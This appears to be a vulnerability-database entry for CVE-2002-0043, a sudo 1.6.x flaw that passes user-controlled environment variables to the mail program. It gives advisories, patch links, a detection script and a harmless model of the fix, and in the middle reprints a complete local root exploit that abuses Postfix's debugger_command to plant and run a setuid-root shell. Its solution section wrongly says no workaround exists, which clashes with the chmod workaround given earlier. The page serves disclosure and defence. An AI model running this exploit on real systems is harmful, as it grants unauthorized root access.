CVE-2002-0043
CVSS 7.2
Published: 2002-01-31 00:00:00
Last modified: 2016-10-17 22:15:32

[Original] sudo 1.6.0 through 1.6.3p7 does not properly clear the environment before calling the mail program, which could allow local users to gain root privileges by modifying environment variables and changing how the mail program is invoked.


[CNNVD] Sudo unclean environment allows command execution as root (CNNVD-200201-013)

        
        Sudo is a free, open-source privilege management program that runs on Linux and several Unix platforms; it is maintained by Todd C. Miller.
        Sudo has an input validation vulnerability that lets a local attacker run programs as root.
        Under some circumstances sudo does not properly clear the environment of the programs it runs. When sudo runs a program such as an MTA as root, a local user can pass unsafe data to that program through environment variables the user controls. Using those variables, the attacker may be able to execute commands as root and so elevate their privileges.
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in a complete system outage]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:todd_miller:sudo:1.6        Todd Miller Sudo 1.6
cpe:/a:todd_miller:sudo:1.6.1      Todd Miller Sudo 1.6.1
cpe:/a:todd_miller:sudo:1.6.2      Todd Miller Sudo 1.6.2
cpe:/a:todd_miller:sudo:1.6.3      Todd Miller Sudo 1.6.3
cpe:/a:todd_miller:sudo:1.6.3_p1
cpe:/a:todd_miller:sudo:1.6.3_p2
cpe:/a:todd_miller:sudo:1.6.3_p3
cpe:/a:todd_miller:sudo:1.6.3_p4
cpe:/a:todd_miller:sudo:1.6.3_p5
cpe:/a:todd_miller:sudo:1.6.3_p6
cpe:/a:todd_miller:sudo:1.6.3_p7   Todd Miller Sudo 1.6.3 p7

- OVAL (technical details for detection)

No OVAL definition found
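No OVAL definition exists for this CVE, so detection has to fall back on the version. The POSIX shell script below is an added example (not from this page, CNNVD or the sudo project): sudo_affected classifies a version string in the form `sudo -V` prints it against the range listed under CPE, 1.6 through 1.6.3p7, and check_installed_sudo applies it to the local host and reports whether the binary still carries the setuid bit that the interim chmod workaround removes. The `Sudo version ` prefix on the first line of `sudo -V` output is an assumption about the host; the particular fixed environment is not involved here.

```shell
#!/bin/sh
# Added example: classify a sudo version against the CVE-2002-0043 range
# (1.6, 1.6.1, 1.6.2, 1.6.3 and 1.6.3p1 through p7; fixed in 1.6.4) and
# probe the local host. Not from this page or the sudo project.

# sudo_affected VERSION
#   exit 0: VERSION is in the affected range
#   exit 1: VERSION is outside it
#   exit 2: VERSION cannot be parsed
# VERSION is the form `sudo -V` prints, e.g. "1.6.3p7" or "1.6".
sudo_affected() {
    ver=${1-}
    base=${ver%%p*}              # drop the "pN" patch level: 1.6.3p7 -> 1.6.3
    case $base in
        ''|*[!0-9.]*|*..*|.*|*.) return 2 ;;   # empty, junk or malformed
    esac
    case $base in *.*) ;; *) return 2 ;; esac  # need at least major.minor
    major=${base%%.*}
    rest=${base#*.}
    minor=${rest%%.*}
    micro=${rest#*.}
    [ "$micro" = "$rest" ] && micro=0       # "1.6" has no micro component
    micro=${micro%%.*}
    # Every patch level of 1.6.3 is affected (p7 was the last one before
    # 1.6.4), so the patch level never changes the verdict.
    [ "$major" -eq 1 ] && [ "$minor" -eq 6 ] && [ "$micro" -le 3 ]
}

# check_installed_sudo
#   exit 0: no affected sudo found (or none installed / version unparseable)
#   exit 1: an affected sudo is installed
# Assumes `sudo -V` prints "Sudo version X" on its first line.
check_installed_sudo() {
    bin=$(command -v sudo) || { echo "sudo: not installed"; return 0; }
    ver=$(sudo -V 2>/dev/null | sed -n '1s/^Sudo version //p')
    rc=0; sudo_affected "$ver" || rc=$?
    case $rc in
        0)
            echo "sudo $ver at $bin: AFFECTED, upgrade to 1.6.4 or later"
            if [ -u "$bin" ]; then
                echo "  setuid bit set; interim mitigation until upgraded: chmod a-s $bin"
                echo "  (this disables sudo for all users; restore with chmod u+s after upgrading)"
            else
                echo "  setuid bit already removed: unusable, but not exploitable this way"
            fi
            return 1 ;;
        1) echo "sudo $ver at $bin: not affected"; return 0 ;;
        *) echo "sudo at $bin: could not parse version '$ver'"; return 0 ;;
    esac
}

# Demonstration on constructed version strings, then a probe of this host.
for v in 1.6 1.6.3 1.6.3p7 1.6.4 1.6.4p1 1.5.9 garbage; do
    rc=0; sudo_affected "$v" || rc=$?
    case $rc in
        0) echo "$v: affected" ;;
        1) echo "$v: not affected" ;;
        *) echo "$v: unparseable" ;;
    esac
done
check_installed_sudo || echo "-> remediation required on this host"
```

The classifier is deliberately strict about its input: anything it cannot parse is reported as unknown rather than silently treated as safe, which is the failure mode to avoid in a scanner.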

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0043
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0043
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200201-013
(official data source) CNNVD

- Other links and resources

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SN-02%3A06.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-02:06
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000451
(UNKNOWN)  CONECTIVA  CLA-2002:451
http://frontal2.mandriva.com/security/advisories?name=MDKSA-2002:003
(UNKNOWN)  MANDRAKE  MDKSA-2002:003
http://marc.info/?l=bugtraq&m=101120193627756&w=2
(UNKNOWN)  BUGTRAQ  20020116 Sudo +Postfix Exploit
http://www.debian.org/security/2002/dsa-101
(UNKNOWN)  DEBIAN  DSA-101
http://www.novell.com/linux/security/advisories/2002_002_sudo_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2002:002
http://www.redhat.com/support/errata/RHSA-2002-011.html
(UNKNOWN)  REDHAT  RHSA-2002:011
http://www.redhat.com/support/errata/RHSA-2002-013.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2002:013
http://www.securityfocus.com/advisories/3800
(UNKNOWN)  IMMUNIX  IMNX-2002-70-001-01
http://www.securityfocus.com/archive/1/250168
(VENDOR_ADVISORY)  BUGTRAQ  20020114 Sudo version 1.6.4 now available (fwd)
http://www.securityfocus.com/bid/3871
(UNKNOWN)  BID  3871
http://www.sudo.ws/sudo/alerts/postfix.html
(UNKNOWN)  MISC  http://www.sudo.ws/sudo/alerts/postfix.html
http://xforce.iss.net/static/7891.php
(UNKNOWN)  XF  sudo-unclean-env-root(7891)

- Vulnerability information

Sudo unclean environment allows command execution as root
Severity: High    Type: Input validation
Published: 2002-01-31 00:00:00    Updated: 2006-09-05 00:00:00
Attack vector: Local
        
        

- Advisories and patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measure to reduce the threat:
        * Temporarily remove the setuid bit from the sudo binary (adjust the path to your installation). Note that this makes sudo unusable for every user until the bit is restored after upgrading:
         # chmod a-s /usr/bin/sudo
        Vendor patches:
        Conectiva
        ---------
        Conectiva has released a security advisory (CLA-2002:451) and corresponding patches:
        CLA-2002:451: sudo
        Patch downloads:
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/sudo-1.6.4p1-1U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/sudo-1.6.4p1-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/sudo-doc-1.6.4p1-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/sudo-1.6.4p1-1U51_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/sudo-1.6.4p1-1U51_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/sudo-doc-1.6.4p1-1U51_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sudo-1.6.4p1-1U60_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sudo-1.6.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sudo-doc-1.6.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sudo-1.6.4p1-1U70_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sudo-1.6.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sudo-doc-1.6.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/sudo-1.6.4p1-1U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sudo-1.6.4p1-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sudo-doc-1.6.4p1-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/sudo-1.6.4p1-1U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sudo-1.6.4p1-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sudo-doc-1.6.4p1-1U50_1cl.i386.rpm
        Debian
        ------
        Debian has released a security advisory (DSA-101-1) and corresponding patches:
        DSA-101-1: New sudo packages fix local root exploit
        Link:
        http://www.debian.org/security/2002/dsa-101

        Patch downloads:
        Debian GNU/Linux 2.2 alias potato
        ------------------------------------
         Source archives:
        http://security.debian.org/dists/stable/updates/main/source/sudo_1.6.2p2-2.1.dsc
        http://security.debian.org/dists/stable/updates/main/source/sudo_1.6.2p2-2.1.diff.gz
        http://security.debian.org/dists/stable/updates/main/source/sudo_1.6.2p2.orig.tar.gz
         Alpha architecture:
        http://security.debian.org/dists/stable/updates/main/binary-alpha/sudo_1.6.2p2-2.1_alpha.deb
         ARM architecture:
        http://security.debian.org/dists/stable/updates/main/binary-arm/sudo_1.6.2p2-2.1_arm.deb
         Intel ia32 architecture:
        http://security.debian.org/dists/stable/updates/main/binary-i386/sudo_1.6.2p2-2.1_i386.deb
         Motorola 680x0 architecture:
        http://security.debian.org/dists/stable/updates/main/binary-m68k/sudo_1.6.2p2-2.1_m68k.deb
         PowerPC architecture:
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/sudo_1.6.2p2-2.1_powerpc.deb
         Sun Sparc architecture:
        http://security.debian.org/dists/stable/updates/main/binary-sparc/sudo_1.6.2p2-2.1_sparc.deb

        FreeBSD
        -------
        FreeBSD has released a security advisory (FreeBSD-SA-02:06) and a fix:
        FreeBSD-SA-02:06: sudo port may enable local privilege escalation
        Link: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:06.sudo.asc
        Do one of the following to fix the vulnerability:
        1) Upgrade your entire ports collection and rebuild the port.
        2) Deinstall the old package and install a new package dated after the correction date, obtained from:
        [i386]
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/security/sudo-1.6.4.1.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/security/sudo-1.6.4.1.tgz
        3) Download a new port skeleton for the sudo port from the address below and use it to rebuild the port:
        http://www.freebsd.org/ports/
        4) Use the portcheckout utility to automate option (3). The portcheckout port is available in
         /usr/ports/devel/portcheckout, or the package can be obtained from:
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
        MandrakeSoft
        ------------
        MandrakeSoft has released a security advisory (MDKSA-2002:003) and corresponding patches:
        MDKSA-2002:003: sudo update
        Link:
        http://www.linux

- Vulnerability information (21227)

Sudo 1.6.3 Unclean Environment Variable Root Program Execution Vulnerability (EDBID:21227)
Platform: linux    Type: local
Date: 2002-01-14    Verified
Author: Charles Stevenson
source: http://www.securityfocus.com/bid/3871/info

Sudo is a freely available, open source permissions management software package available for the Linux and Unix operating systems. It is maintained by Todd C. Miller.

Under some circumstances, sudo does not properly sanitize the environment it executes programs with. In the event that sudo is used to run a program such as an MTA with root privileges, this could result in a local user passing unsafe data to the program via environment variables. From these environment variables the user may be able to execute commands as root, and potentially gain elevated privileges.

#!/bin/sh
#
# root shell exploit for postfix + sudo
# tested on debian powerpc unstable
#
# by Charles 'core' Stevenson <core@bokeoa.com>
#
# (Uses "echo -e", so it expects a shell whose echo accepts -e, as the
# bash-based /bin/sh of the Debian system it was tested on did.)

# Put your password here if you're not in the sudoers file
PASSWORD=wdnownz

echo -e "sudo exploit by core <core@bokeoa.com>\n"

# Copy the real Postfix configuration so the attacker-controlled copy is
# complete and valid apart from the one parameter added below.
echo "Setting up postfix config directory..."
/bin/cp -r /etc/postfix /tmp

# debugger_command is run by Postfix when debugging is enabled; this one
# plants a setuid-root copy of /bin/sh.
echo "Adding malicious debugger command..."
echo "debugger_command = /bin/cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh">>/tmp/postfix/main.cf

# MAIL_CONFIG points Postfix at the modified configuration directory and a
# set MAIL_DEBUG (here with an empty value) turns debugging on. Vulnerable
# sudo passes both variables through to the mailer, which it runs as root.
echo "Setting up environment..."
export MAIL_CONFIG=/tmp/postfix
export MAIL_DEBUG=

sleep 2

# The sudo attempt itself does not need to succeed: it only has to make sudo
# send its notification mail, and that mailer invocation runs debugger_command.
echo "Trying to exploit..."
echo -e "$PASSWORD\n"|/usr/bin/sudo su -

sleep 2

echo "We should have a root shell let's check..."
ls -l /tmp/sh

echo "Cleaning up..."
rm -rf /tmp/postfix

echo "Attempting to run root shell..."
/tmp/sh
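Why the script above works, and what the fix changes, as an added example that is not part of the Exploit-DB entry or the sudo project. It runs unprivileged in a temporary directory: a constructed stand-in for Postfix's sendmail models the two behaviours the exploit relies on (MAIL_CONFIG chooses the configuration directory; a set MAIL_DEBUG makes it run debugger_command from that directory's main.cf), and two notification-mail senders drive it, one passing the invoking user's environment through as sudo 1.6.0 through 1.6.3p7 did, the other starting from an empty environment with fixed values, which is the approach of the 1.6.4 fix. The fake sendmail is a simplified model (real Postfix applies further conditions, in particular on who the caller is, before honouring MAIL_CONFIG, which is why a root invocation mattered), and the particular fixed variables are illustrative rather than sudo's exact list.

```shell
#!/bin/sh
# Added example, not from the page or the sudo project: an unprivileged model
# of the CVE-2002-0043 mechanism and of the environment-clearing fix.
set -u

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed stand-in for /usr/sbin/sendmail. Simplified: MAIL_CONFIG picks
# the configuration directory, and when MAIL_DEBUG is set, debugger_command
# from that directory's main.cf is executed.
cat > "$WORK/sendmail" <<'EOF'
#!/bin/sh
cfg=${MAIL_CONFIG:-/etc/postfix}
if [ -n "${MAIL_DEBUG+set}" ] && [ -r "$cfg/main.cf" ]; then
    cmd=$(sed -n 's/^debugger_command *= *//p' "$cfg/main.cf")
    [ -n "$cmd" ] && sh -c "$cmd"
fi
cat >/dev/null    # consume the message like a real MTA would
EOF
chmod +x "$WORK/sendmail"

# Attacker-controlled configuration directory, the equivalent of /tmp/postfix
# in the exploit. The payload is a harmless marker file, not a setuid shell.
mkdir "$WORK/postfix"
echo "debugger_command = touch $WORK/pwned" > "$WORK/postfix/main.cf"

# sudo 1.6.0 through 1.6.3p7 behaviour: the notification mail is piped to the
# mailer with the invoking user's environment (MAIL_CONFIG, MAIL_DEBUG) intact.
send_alert_unclean() {
    printf 'Subject: sudo alert\n\nconstructed notification\n' |
        MAIL_CONFIG="$WORK/postfix" MAIL_DEBUG= "$WORK/sendmail"
}

# 1.6.4-style behaviour: the user still has both variables exported, but the
# mailer is started from an empty environment with fixed values only, so
# nothing the user controls reaches it.
send_alert_clean() {
    printf 'Subject: sudo alert\n\nconstructed notification\n' |
        MAIL_CONFIG="$WORK/postfix" MAIL_DEBUG= \
        env -i HOME=/ PATH=/usr/bin:/bin LOGNAME=root USER=root "$WORK/sendmail"
}

# payload_ran: exit 0 if debugger_command executed since the last reset_marker.
payload_ran() { [ -e "$WORK/pwned" ]; }
reset_marker() { rm -f "$WORK/pwned"; }

reset_marker; send_alert_unclean
payload_ran && echo "unclean environment: debugger_command ran (exploitable)"
reset_marker; send_alert_clean
payload_ran || echo "clean environment: debugger_command did not run (fixed)"
```

The same rule generalises beyond the mailer: a setuid program that spawns a helper must hand it a constructed environment (env -i plus an explicit allowlist, or execve with an envp it built itself), never the environment it inherited from the invoking user.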

- Vulnerability information

2025
sudo Unclean Environment Variable Root Program Execution
Location: Local Access Required    Attack type: Input Manipulation
Impact: Loss of Integrity    Solution: Upgrade
Exploit: Public    Disclosure: Third-party Verified

- Vulnerability description

sudo 1.6.0 through 1.6.3p7 does not properly clear the environment before calling the mail program, which could allow local users to gain root privileges by modifying environment variables and changing how the mail program is invoked.

- Timeline

2002-01-14 Unknown
2002-01-14 Unknown

- Solution

Upgrade to version 1.6.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Credit

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.